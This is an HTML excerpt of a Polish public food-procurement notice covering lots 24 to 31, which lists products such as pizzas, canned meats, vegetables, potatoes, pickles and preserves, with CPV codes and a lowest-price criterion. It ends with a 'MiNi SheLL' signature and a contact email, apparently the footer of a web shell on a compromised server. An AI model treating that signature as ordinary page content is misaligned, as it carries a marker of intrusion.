<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 24 - wyroby mączne mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Pizza z szynką ~250g  
2		Pizza z pieczarkami ~250g 
3		Pizza ~250g różne smaki
4		Zapiekanka z szynką mała
5		Zapiekanka z salami mała
6		Zapiekanka z pieczarkami mała
7		Hamburger z bułką 
8		Hot-dog.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 25 - przetwory warzywne, konserwy mięsne i rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Pasztet mix 130g
2		Sałatka 1700g różne smaki
3		Sałatka obiadowa ~ 900g
4		Smalec z mięsem 110÷130g
5		Pasztet drobiowy 90g
6		Boczek zbójnicki ~ 115g
7		Konserwa golonkowa ~125g
8		Wiejski przysmak ~147g
9		Konserwa turystyczna ~130g
10		Gulasz angielski ~125g
11		Szynka mielona ~130g
12		Szynka Polska wiejska delikatesowa ~125g
13		Szynka, polędwica drobiowa 110÷125g
14		Sałatki typu Lisner ~ 150g - różne smaki
15		Pasta pastella Lisner 80g różne smaki
16		Konserwy rybne różne smaki ~ 170g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.13.10.00-5, 15.89.72.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet nr 26 - warzywa korzeniowe, kapustne, zielone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Marchew korzeń
2		Burak czerwony
3		Pietruszka korzeń
4		Seler korzeń
5		Kapusta biała (główka)
6		Kapusta czerwona (główka)
7		Kapusta pekińska (główka)
8		Kapusta brukselka
9		Cebula zaschnięta
10		Czosnek krajowy, 
średnica ok. 3cm
11		Pietruszka zielona: okres letni, pęczek nie mniej niż 100g
12		Pietruszka zielona: okres zimowy, pęczek nie mniej niż 50g
13		Koperek: okres letni, pęczek nie mniej niż 70g
14		Koperek: okres zimowy, pęczek nie mniej niż 35g
15		Por ok. 150÷200g sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.13.00-9, 03.22.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet nr 27 - ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Ziemniaki jadalne późne workowane 25 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet nr 28 - kiszonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Ogórek kiszony
2		Kapusta kiszona.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7, 15.33.11.42-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet nr 29 - warzywa młode, sezonowe, nowalijki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Marchew młoda obcinana
2		Marchew młoda pęczki, min. 5szt/pęczek
3		Seler z nacią pęczki, 3szt/pęczek
4		Buraki młode
5		Ziemniaki jadalne wczesne
6		Por import
7		Kapusta biała wczesna, średnica ~15cm
8		Kapusta czerwona wczesna, średnica ~15cm
9		Cebula młoda (nie zaschnięta
10		Pomidory
11		Ogórek zielony świeży
12		Ogórek szklarniowy
13		Papryka żółta, zielona
14		Papryka czerwona
15		Kabaczek/cukinia
16		Kalafior, średnica ~15cm
17		Brokuły, średnica ~15cm
18		Fasolka szparagowa
19		Botwina
20		Kalarepka, średnica ~6cm
21		Fasolka szparagowa zielona
22		Kapusta kiszona młoda
23		Rzodkiewka, pęczek nie mniej niż 10 szt.
24		Sałata zielona główka
25		Szczypiorek, pęczek nie mniej niż 70g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet nr 30 - wędliny paczkowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Wędliny wysokogatunkowe paczkowane typu szynka extra, baleron, polędwica sopocka 100g - 150g
2 Wędliny wysokogatunkowe paczkowane podsuszane typu kabanos, myśliwska 100g - 150g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet nr 31 - Przetwory warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Koncentrat pomidorowy 30% op. ~4500÷4800g
2	Koncentrat pomidorowy 30% op. ~3200÷3300g
3	Koncentrat pomidorowy 30% op. 1 kg
4	Koncentrat pomidorowy 30% op. 400g
5	Koncentrat pomidorowy 30% op. 200g
6	Koncentrat pomidorowy 30% op. 70g
7	Groszek zielony konserwowy 400g
8	Kukurydza konserwowa 400g
9	Kukurydza konserwowa 2650g
10	Papryka konserwowa cała ~900g
11	Papryka konserwowa ćwiartki ~720g
12	Papryka konserwowa  ~500g
13	Papryka konserwowa  ~300g
14	Ogórek konserwowy 1 l
15	Fasolka konserwowa zielona ~720g
16	Fasolka konserwowa zielona ~520g
17	Fasolka konserwowa czerwona ~400g
18	Chrzan tarty na kwasku cytr. ~180g
19	Musztarda chrzanowa ~190g
20	Musztarda stołowa ~500g
21	Majonez wyborowy ~250g
22	Sok Bobofrut b/c 175 ml
23	Powidła śliwkowe ~300g
24	Dżem ~280÷330g
25	Dżem opakowanie 25g
26	Miód pszczeli naturalny opakowanie 25g
27	Miód pszczeli naturalny ~200g
28	Miód pszczeli naturalny ~400g
29	Miód sztuczny ~320g
30	Pasztet drobiowy ~130÷160g
31	Pasztet drobiowy 50g
32	Ketchup 250g
33	Majonez wyborowy ~720g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com